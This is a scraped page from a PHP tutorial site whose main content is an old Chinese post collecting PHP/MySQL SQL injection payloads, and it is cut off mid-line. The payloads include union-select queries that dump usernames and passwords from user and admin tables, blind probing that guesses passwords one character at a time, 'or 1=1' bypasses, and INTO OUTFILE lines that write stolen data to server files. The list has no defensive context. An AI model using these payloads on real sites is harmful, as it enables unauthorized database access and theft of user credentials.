communauté

Apprendre

Bibliothèque d'outils

Outils d'IA

Loisirs

Français

Maison > php教程 > PHP源码 > php注入方法集锦

php注入方法集锦

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Libérer： 2016-06-08 17:32:14

original

1043 Les gens l'ont consulté

<script>ec(2);</script>

''%23

'' and passWord=''mypass

id=-1 union select 1,1,1

id=-1 union select char(97),char(97),char(97)

id=1 union select 1,1,1 from members

id=1 union select 1,1,1 from admin

id=1 union select 1,1,1 from user

userid=1 and password=mypass

userid=1 and mid(password,3,1)=char(112)

userid=1 and mid(password,4,1)=char(97)

and ord(mid(password,3,1))>111 （ord函数很好用，可以返回整形的）

'' and LENGTH(password)=''6（探测密码长度）

'' and LEFT(password,1)=''m

'' and LEFT(password,2)=''my

…………………………依次类推

'' union select 1,username,password from user/*

'' union select 1,username,password from user/*

='' union select 1,username,password from user/* （可以是1或者=后直接跟）

99999'' union select 1,username,password from user/*

'' into outfile ''c:/file.txt （导出文件）

='' or 1=1 into outfile ''c:/file.txt

1'' union select 1,username,password from user into outfile ''c:/user.txt

select password FROM admins where login=''John'' INTO DUMPFILE ''/path/to/site/file.txt''

id='' union select 1,username,password from user into outfile

id=-1 union select 1,database(),version() （灵活应用查询）

常用查询测试语句，

select * FROM table where 1=1

select * FROM table where ''uuu''=''uuu''

select * FROM table where 12

select * FROM&nbs

Étiquettes associées：

from nbsp select union

source：php.cn

Article précédent：PHP5.3 snapshots Article suivant：PHP批量生成缩略图

Déclaration de ce site Web

Le contenu de cet article est volontairement contribué par les internautes et les droits d'auteur appartiennent à l'auteur original. Ce site n'assume aucune responsabilité légale correspondante. Si vous trouvez un contenu suspecté de plagiat ou de contrefaçon, veuillez contacter admin@php.cn

Derniers articles par auteur

Qu'est-ce qu'une NullPointerException et comment y remédier ?

2024-10-22 09:46:29
De novice à codeur : votre voyage commence par les principes fondamentaux du C

2024-10-13 13:53:41
Débloquer le développement Web avec PHP : guide du débutant

2024-10-12 12:15:51
Démystifier C : un chemin clair et simple pour les nouveaux programmeurs

2024-10-11 22:47:31
Libérez votre potentiel de codage : programmation C pour les débutants absolus

2024-10-11 19:36:51
Libérez votre programmeur intérieur : C pour les débutants absolus

2024-10-11 15:50:41
Automatisez votre vie avec C : scripts et outils pour les débutants

2024-10-11 15:07:41
PHP Made Easy : vos premiers pas dans le développement Web

2024-10-11 14:21:21
Construisez n'importe quoi avec Python : un guide du débutant pour libérer votre créativité

2024-10-11 12:59:11
La clé du codage : libérer la puissance de Python pour les débutants

2024-10-11 12:17:31

Derniers numéros

javascript - chaîne spécifique de correspondance régulière js

Depuis 1970-01-01 08:00:00

0

0

0

Constantes et variables PHP, variables externes, problèmes de code dans le manuel

Depuis 1970-01-01 08:00:00

0

0

0

Pourquoi ne puis-je pas générer de code QR ?

Depuis 1970-01-01 08:00:00

0

0

0

Pourquoi dit-on que les non-objets appellent la fonction membre fetch()

Depuis 1970-01-01 08:00:00

0

0

0

La ligne 77 dit que le non-objet appelle la fonction fetch(). Quelqu'un peut-il l'expliquer, je ne le trouve vraiment pas ?

Depuis 1970-01-01 08:00:00

0

0

0

Rubriques connexes

Plus>

Recommandations populaires

Tutoriels populaires

Plus>

Tutoriels associés

Recommandations populaires

Derniers cours

Derniers téléchargements

Plus>

effets Web

Code source du site Web

Matériel du site Web

Modèle frontal